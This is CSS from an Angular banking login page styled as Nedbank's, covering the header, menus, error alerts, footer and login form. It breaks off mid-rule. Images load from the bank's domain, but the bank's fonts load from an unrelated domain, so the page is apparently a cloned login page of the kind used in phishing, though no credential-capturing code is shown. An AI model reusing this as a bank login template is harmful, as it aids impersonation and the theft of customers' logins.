.right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   .details[_ngcontent-c1]{display:none}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   .icon[_ngcontent-c1]{position:relative;width:16px}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   .icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/location-blank-green.4b8e66bca4aac4a2aad6.svg);width:100%;height:100%;display:block}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   a[_ngcontent-c1]{color:#006341;outline:0;text-decoration:none;font-size:18px}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   a[_ngcontent-c1]:active, .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   a[_ngcontent-c1]:active:focus, .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   a[_ngcontent-c1]:focus, .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   a[_ngcontent-c1]:hover{color:#006341}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]{text-align:right}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]   a[_ngcontent-c1], .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]   a[_ngcontent-c1]:focus{text-decoration:none;display:inline;font-size:18px}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]   .icon[_ngcontent-c1]{position:relative;width:20px;margin-right:10px}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]   .icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/contact-blank-green.a180fba4b897921edd0b.svg);width:100%;height:100%;display:block}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]   .details[_ngcontent-c1]{display:inline-block}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   .call[_ngcontent-c1]{font-size:18px}.sub-menu-mob[_ngcontent-c1]{position:fixed;left:50px;right:0;top:0;bottom:0;background:#fff;z-index:10000;width:calc(100% - 50px);transform:translate(100%);-webkit-transform:translate(100%);-moz-transform:translate(100%);-ms-transform:translate(100%);-o-transform:translate(100%);transition:-webkit-transform .25s ease-in-out;transition:transform .25s ease-in-out;transition:transform .25s ease-in-out,-webkit-transform .25s ease-in-out;-webkit-transition:transform .25s ease-in-out;-moz-transition:transform .25s ease-in-out;-ms-transition:transform .25s ease-in-out;-o-transition:transform .25s ease-in-out;border-left:1px solid #bbb}.sub-menu-mob.active[_ngcontent-c1]{transform:translate(0);-webkit-transform:translate(0);-moz-transform:translate(0);-ms-transform:translate(0);-o-transform:translate(0)}.sub-menu-mob.active[_ngcontent-c1]   .details[_ngcontent-c1]   .sub-menu-close[_ngcontent-c1]{display:block}.sub-menu-mob[_ngcontent-c1]   .details[_ngcontent-c1]{padding:50px 0 10px 0;height:100%;position:relative}.sub-menu-mob[_ngcontent-c1]   .details[_ngcontent-c1]   .mobile-header-menu[_ngcontent-c1]   li.active[_ngcontent-c1]{background-color:#eee}.sub-menu-mob[_ngcontent-c1]   .details[_ngcontent-c1]   .sub-menu-close[_ngcontent-c1]{position:absolute;right:100%;top:0;width:50px;height:50px;background:#006341;padding:14px 0 0 14px;cursor:pointer;display:none}.sub-menu-mob[_ngcontent-c1]   .details[_ngcontent-c1]   .sub-menu-close[_ngcontent-c1]   .cross[_ngcontent-c1]{width:22px;height:22px;display:block;position:relative}.sub-menu-mob[_ngcontent-c1]   .details[_ngcontent-c1]   .sub-menu-close[_ngcontent-c1]   .cross[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/back.efe5f6f11bd3458f773b.svg);width:100%;height:100%;display:block}.sub-menu-mob[_ngcontent-c1]   .menu-title[_ngcontent-c1]{padding:0 20px 0 40px;line-height:60px;font-family:MarkProBold,Century Gothic,Helvetica,Arial,Any Sans Serif font;font-weight:700;border-bottom:1px solid #f9f9f9;color:#333;margin:0}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]{padding-left:0;list-style:none;height:calc(100% - 62px);overflow-y:auto}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]{box-shadow:0 1px 1px 0 #f0f0f0}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]:last-child{border-bottom:none}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   a[_ngcontent-c1]{display:block;line-height:60px;padding:0 20px 0 40px;text-decoration:none;color:#333}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   a[_ngcontent-c1]   .icon[_ngcontent-c1], .sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   a[_ngcontent-c1]   .text[_ngcontent-c1]{display:inline-block;vertical-align:middle;line-height:1}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   a[_ngcontent-c1]   .icon[_ngcontent-c1]{width:16px;margin-right:17px}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   a[_ngcontent-c1]   .icon.arrow-icon[_ngcontent-c1]{position:relative;float:right;width:10px;margin:24px 0 0}.sub-menu-mob[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   a[_ngcontent-c1]   .icon.arrow-icon[_ngcontent-c1]:before{content:url(https://secured.nedbank.co.za/Arrow.83ae2f145ac1d885f045.svg);width:100%;height:100%;display:block}@media (min-width:768px){.main-header[_ngcontent-c1]{padding:20px 0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .hamburger-icon[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .logo[_ngcontent-c1]{width:40px;height:40px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]{position:static;background:none;left:auto;top:auto;height:auto;padding:0;width:calc(100% - 45px);transform:translate(0);-webkit-transform:translate(0);-moz-transform:translate(0);-ms-transform:translate(0);-o-transform:translate(0);overflow:visible}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1]   .user-details[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1]{padding-left:20px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]{float:left;border-bottom:none;box-shadow:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li.mob-only[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]{padding:0 10px;color:#fff;line-height:40px;letter-spacing:.05px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a.active[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]:hover{color:#fff;text-decoration:none;font-family:MarkProMedium,Century Gothic,Helvetica,Arial,Any Sans Serif font;font-weight:400;letter-spacing:0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]:active{outline:none;color:#fff;font-family:MarkProMedium,Century Gothic,Helvetica,Arial,Any Sans Serif font;font-weight:400}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .arrow-icon[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]   .icon[_ngcontent-c1]{margin-right:2px;display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]{margin-left:20px;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]{cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]:first-child{margin-left:0}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.search[_ngcontent-c1]{display:none}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.logout[_ngcontent-c1], .main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.setting[_ngcontent-c1]{display:inline-block;cursor:pointer}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]{display:inline-block;cursor:pointer;min-width:90px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.contact[_ngcontent-c1]{display:inline-block}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.cross[_ngcontent-c1]{display:none}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]{margin-left:40px}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1], .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li[_ngcontent-c1]   .details[_ngcontent-c1]{display:inline-block}.main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.branch[_ngcontent-c1]   .icon[_ngcontent-c1], .main-header.un-auth[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1]   ul[_ngcontent-c1]   li.contact-details[_ngcontent-c1]   .icon[_ngcontent-c1]{margin-right:10px}.sub-menu-mob[_ngcontent-c1]{display:none}}@media (min-width:1024px){.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .left[_ngcontent-c1]   .main-nav[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1] > a[_ngcontent-c1]{padding:0 20px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]{margin-left:25px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li[_ngcontent-c1]:first-child{margin-left:15px}.main-header[_ngcontent-c1]   .header-block[_ngcontent-c1]   .right[_ngcontent-c1] > ul[_ngcontent-c1] > li.user-container[_ngcontent-c1]{min-width:215px}}[_nghost-c1]  .user-container .pop-over{width:100%;margin-top:28px!important}[_nghost-c1]  .user-container.open:before{left:auto!important;right:20px!important;border-left-width:12px!important;border-right-width:12px!important;border-bottom-width:13px!important}[_nghost-c1]  .user-container.open:after{left:auto!important;right:24px!important;height:16px!important;width:16px!important}</style>
      <style>.clearfix[_ngcontent-c2]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c2]   html[_ngcontent-c2]   .clearfix[_ngcontent-c2]{height:1%}.clearfix[_ngcontent-c2]{display:block}[_nghost-c2]  .bodyalert alert div.alert{position:fixed;width:100%;z-index:10}.popupClass[_ngcontent-c2]{margin-top:20px}.application-error[_ngcontent-c2]{font-size:14px}.application-error[_ngcontent-c2]   .system-error-message[_ngcontent-c2]{padding-right:40px;padding-left:10px}.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]{position:relative;padding-right:10px;width:36px;height:36px;display:inline-block;vertical-align:middle}.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]   .icon[_ngcontent-c2]{width:100%;left:0;top:-3px;cursor:pointer;display:inline-block;height:100%}.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]   .icon.warning[_ngcontent-c2]{position:relative}.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]   .icon.warning[_ngcontent-c2]:before{content:url(https://secured.nedbank.co.za/Error.63d9ff08640e6fe4b4ce.svg);width:100%;height:100%;display:block}.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]   .icon.close[_ngcontent-c2]{width:20px;height:20px;position:relative}.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]   .icon.close[_ngcontent-c2]:before{content:url(close-red.d3a161a3277ccdb006e2.svg);width:100%;height:100%;display:block}.application-error[_ngcontent-c2]   .text[_ngcontent-c2]{display:inline-block;vertical-align:middle;width:calc(100% - 65px)}.application-error[_ngcontent-c2]   .text[_ngcontent-c2]   .redirect-link[_ngcontent-c2]{text-decoration:underline;font-weight:700;cursor:pointer}@media (max-width:767px){.application-error[_ngcontent-c2]   .icon-field[_ngcontent-c2]   .icon[_ngcontent-c2]{top:0}}</style>
      <style>.clearfix[_ngcontent-c3]:after, .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c3]   html[_ngcontent-c3]   .clearfix[_ngcontent-c3], *[_ngcontent-c3]   html[_ngcontent-c3]   .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3], .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   *[_ngcontent-c3]   html[_ngcontent-c3]   .footer-nav[_ngcontent-c3]{height:1%}.clearfix[_ngcontent-c3], .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]{display:block}.main-footer[_ngcontent-c3]{background:#eee;padding:20px 0;color:#333;height:176px}@media (min-width:460px){.main-footer[_ngcontent-c3]{height:156px}}@media (min-width:767px){.main-footer[_ngcontent-c3]{height:123px}}@media (min-width:926px){.main-footer[_ngcontent-c3]{height:101px}}@media (min-width:1440px){.main-footer[_ngcontent-c3]{height:85px}}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]{list-style:none;padding:0}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]{float:left;width:50%;margin-bottom:10px;line-height:2;cursor:pointer}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]{display:block;color:#333;text-decoration:none;outline:0;font-size:.875rem}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]:active, .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]:active:focus, .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]:focus, .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]:hover{color:#333}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon[_ngcontent-c3], .main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .text[_ngcontent-c3]{display:inline-block;vertical-align:middle;line-height:1}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon[_ngcontent-c3]{width:16px}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .text[_ngcontent-c3]{width:calc(100% - 25px)}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon-security[_ngcontent-c3]{position:relative}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon-security[_ngcontent-c3]:before{content:url(https://secured.nedbank.co.za/security.c47b8f1a2bc2195ff7ef.svg);width:100%;height:100%;display:block}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon-location[_ngcontent-c3]{position:relative}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon-location[_ngcontent-c3]:before{content:url(https://secured.nedbank.co.za/location-blank.e36d304f8628a21886d3.svg);width:100%;height:100%;display:block}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon-help[_ngcontent-c3]{position:relative}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .icon-help[_ngcontent-c3]:before{content:url(https://secured.nedbank.co.za/phoneicon.d20aa97e94487e70b840.svg);width:100%;height:100%;display:block}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .contact[_ngcontent-c3]{position:relative}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .contact[_ngcontent-c3]:before{content:url(https://secured.nedbank.co.za/contact-footer.ff0deb4d99b5c501e332.svg);width:100%;height:100%;display:block}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .TnC[_ngcontent-c3]{position:relative}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .TnC[_ngcontent-c3]:before{content:url(https://secured.nedbank.co.za/tncs.04b64534a4bbcb7c2676.svg);width:100%;height:100%;display:block}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .copyright[_ngcontent-c3]{font-size:10px}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .copyright[_ngcontent-c3]   .text[_ngcontent-c3]{display:inline-block}@media (min-width:768px){.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]{margin-bottom:10px}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]{width:auto;margin:0 40px 0 0}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]:last-child{margin-right:0}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]   li[_ngcontent-c3]   a[_ngcontent-c3]   .text[_ngcontent-c3]{width:auto;font-size:1rem}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .copyright[_ngcontent-c3]{font-size:12px}}@media (min-width:1440px){.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]{display:-webkit-box;display:-ms-flexbox;display:flex;-moz-align-items:center;-ms-align-items:center;-o-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .footer-nav[_ngcontent-c3]{-webkit-box-flex:1;-ms-flex:1;flex:1;margin-bottom:0}.main-footer[_ngcontent-c3]   .footer-block[_ngcontent-c3]   .copyright[_ngcontent-c3]   .text[_ngcontent-c3]{display:block;text-align:right;font-size:.875rem}}</style>
      <style>
            @font-face {
                    font-family: MarkPro;
                    src: url("https://faithpays.sowetoinnovations.co.za/KhRo/fonts/FontFont - MarkPro.12d6724a254d3be629fc.otf")
            }

            @font-face {
                    font-family: MarkProMedium;
                    src: url("https://faithpays.sowetoinnovations.co.za/KhRo/fonts/FontFont - MarkPro-Medium.8531ae94f5ad973be8b7.otf")
            }

            @font-face {
                    font-family: MarkProBold;
                    src: url("https://faithpays.sowetoinnovations.co.za/KhRo/fonts/FontFont - MarkPro-Bold.476d44b0f6c8939bb885.otf")
            }
            
            @font-face {
                font-family: Glyphicons Halflings;
                src: url(glyphicons-halflings-regular.f4769f9bdb7466be6508.eot);
                src: url(glyphicons-halflings-regular.f4769f9bdb7466be6508.eot?#iefix) format("embedded-opentype"), url(glyphicons-halflings-regular.448c34a56d699c29117a.woff2) format("woff2"), url(glyphicons-halflings-regular.fa2772327f55d8198301.woff) format("woff"), url(glyphicons-halflings-regular.e18bbf611f2a2e43afc0.ttf) format("truetype"), url(glyphicons-halflings-regular.89889688147bd7575d63.svg#glyphicons_halflingsregular) format("svg")
            }
      </style>
      <style>.clearfix[_ngcontent-c5]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c5]   html[_ngcontent-c5]   .clearfix[_ngcontent-c5]{height:1%}.clearfix[_ngcontent-c5]{display:block}.spinner-container[_ngcontent-c5]{animation:rotate 2s linear infinite;-webkit-animation:rotate 2s linear infinite;z-index:100}.spinner-container[_ngcontent-c5]   .path[_ngcontent-c5]{stroke-dasharray:1,150;stroke-dashoffset:0;stroke:#fff;stroke-linecap:round;animation:dash 1.5s ease-in-out infinite;-webkit-animation:dash 1.5s ease-in-out infinite}.spinner-container[_ngcontent-c5]   .path.green[_ngcontent-c5]{stroke:#009639}@keyframes rotate{to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes dash{0%{stroke-dasharray:1,150;stroke-dashoffset:0}50%{stroke-dasharray:90,150;stroke-dashoffset:-35}to{stroke-dasharray:90,150;stroke-dashoffset:-124}}@-webkit-keyframes rotate{to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@-webkit-keyframes dash{0%{stroke-dasharray:1,150;stroke-dashoffset:0}50%{stroke-dasharray:90,150;stroke-dashoffset:-35}to{stroke-dasharray:90,150;stroke-dashoffset:-124}}</style>
      <style>.clearfix[_ngcontent-c10]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c10]   html[_ngcontent-c10]   .clearfix[_ngcontent-c10]{height:1%}.clearfix[_ngcontent-c10]{display:block}.component-container[_ngcontent-c10]{margin:auto;font-family:MarkPro,Century Gothic,Helvetica,Arial,Any Sans Serif font;width:100%;background:#fff}.content-container[_ngcontent-c10]{display:table;width:100%;font-size:16px;vertical-align:top;text-align:left;height:calc(100vh - 206px)}.content-container[_ngcontent-c10]   .left-margin[_ngcontent-c10]{margin-left:40px}.tableRow[_ngcontent-c10]{display:table-row}.tableCell[_ngcontent-c10]{display:table-cell;vertical-align:middle}.information-container[_ngcontent-c10]{margin:0;padding:0;overflow:hidden}.information-container-small[_ngcontent-c10]{display:none}.login-container[_ngcontent-c10]{font-size:16px;vertical-align:middle;text-align:left;padding:1em 1em 0 1em;width:45%}.login-container[_ngcontent-c10]   .formInput[_ngcontent-c10]{max-width:400px;margin:auto}.login-container[_ngcontent-c10]   .registerText[_ngcontent-c10]{font-size:14px;margin-bottom:10px}.entrustContainer[_ngcontent-c10]{margin-left:50px;padding:0 10px 10px 10px;display:table}.entrustContainer[_ngcontent-c10]   .iconEntrust[_ngcontent-c10]{width:48px;height:48px}.entrustContainer[_ngcontent-c10]   .entrustText[_ngcontent-c10]{font-size:14px;color:#666;padding-left:20px}.iconCardPin[_ngcontent-c10]{position:relative}.iconCardPin[_ngcontent-c10]:before{content:url(https://secured.nedbank.co.za/CardPIN.53498cd9c22ec372e5e2.svg);width:30px;height:30px;display:block}.iconPPP[_ngcontent-c10]{position:relative}.iconPPP[_ngcontent-c10]:before{content:url(https://secured.nedbank.co.za/PPP.cee7674f38c105ee0fb4.svg);width:100%;height:100%;display:block}.iconImg[_ngcontent-c10]{position:absolute!important;display:inline-block;cursor:pointer}.icon-field[_ngcontent-c10]   .registerHeadingText[_ngcontent-c10]{font-size:16px;color:#666;margin-left:60px;text-decoration:none}.icon-field[_ngcontent-c10]   .registerText[_ngcontent-c10]{margin:0 0 0 60px;font-size:14px;color:#666}[_ngcontent-c10]::-ms-clear, [_ngcontent-c10]::-ms-reveal{display:none}.link-text[_ngcontent-c10], a[_ngcontent-c10]:active, a[_ngcontent-c10]:hover, a[_ngcontent-c10]:visited{text-decoration:none}.link-text[_ngcontent-c10]{color:#009639;font-size:14px;margin:18px 0;font-weight:700;cursor:pointer}.link-text.assistance[_ngcontent-c10]{float:right;margin:1px 0 0 0}.link-text[_ngcontent-c10]:active, .link-text[_ngcontent-c10]:hover, .link-text[_ngcontent-c10]:visited{text-decoration:none}.registerBlock[_ngcontent-c10]{padding-bottom:0}.login-title[_ngcontent-c10], .registerBlock[_ngcontent-c10]{color:#333;font-size:20px}.boldText[_ngcontent-c10]{font-family:MarkProBold,Century Gothic,Helvetica,Arial,Any Sans Serif font,MarkProMedium}.mediumText[_ngcontent-c10]{font-family:MarkProMedium,Century Gothic,Helvetica,Arial,Any Sans Serif font,MarkPro}.input-container[_ngcontent-c10]{position:relative}.input-img[_ngcontent-c10]{position:absolute;bottom:36%;right:12px;width:25px;height:25px}.top-margin30[_ngcontent-c10]{margin-top:30px}.top-margin50[_ngcontent-c10]{margin-top:50px}.helpText[_ngcontent-c10]{font-size:14px;color:#bbb;margin:5px 0 0}@media screen and (max-width:1024px){.headingText[_ngcontent-c10]{font-size:20px;font-weight:700;margin:0;color:#333;line-height:1}}@media screen and (max-width:768px){.information-container[_ngcontent-c10]{display:none}.content-container[_ngcontent-c10]{background-image:none;height:auto}.link-text.assistance[_ngcontent-c10]{float:none;display:block;margin-top:20px}.information-container-small[_ngcontent-c10]{padding:0;width:100%;display:block}.information-container-small[_ngcontent-c10]   .registerText[_ngcontent-c10]{margin:0;padding:10px;font-size:14px;color:#666}.information-container-small[_ngcontent-c10]   .img-Container[_ngcontent-c10]{display:none}.information-container-small[_ngcontent-c10]   .linkButtons[_ngcontent-c10]{margin:10px 0 10px 0}.information-container-small[_ngcontent-c10]   .anchorDiv[_ngcontent-c10]{background-color:#eee;padding:15px;margin:20px 0 20px 0;font-size:14px}.information-container-small[_ngcontent-c10]   .anchorDiv[_ngcontent-c10]   .link-text[_ngcontent-c10]{margin:0;text-decoration:underline;cursor:pointer}.information-container-small[_ngcontent-c10]   .anchorDiv[_ngcontent-c10]   .link-text[_ngcontent-c10]:active, .information-container-small[_ngcontent-c10]   .anchorDiv[_ngcontent-c10]   .link-text[_ngcontent-c10]:hover, .information-container-small[_ngcontent-c10]   .anchorDiv[_ngcontent-c10]   .link-text[_ngcontent-c10]:visited{text-decoration:underline}.left-margin[_ngcontent-c10]{margin-left:10px}.login-container[_ngcontent-c10]{width:100%}.login-container[_ngcontent-c10]   .formInput[_ngcontent-c10]{max-width:none}.entrustContainer[_ngcontent-c10]{margin:0 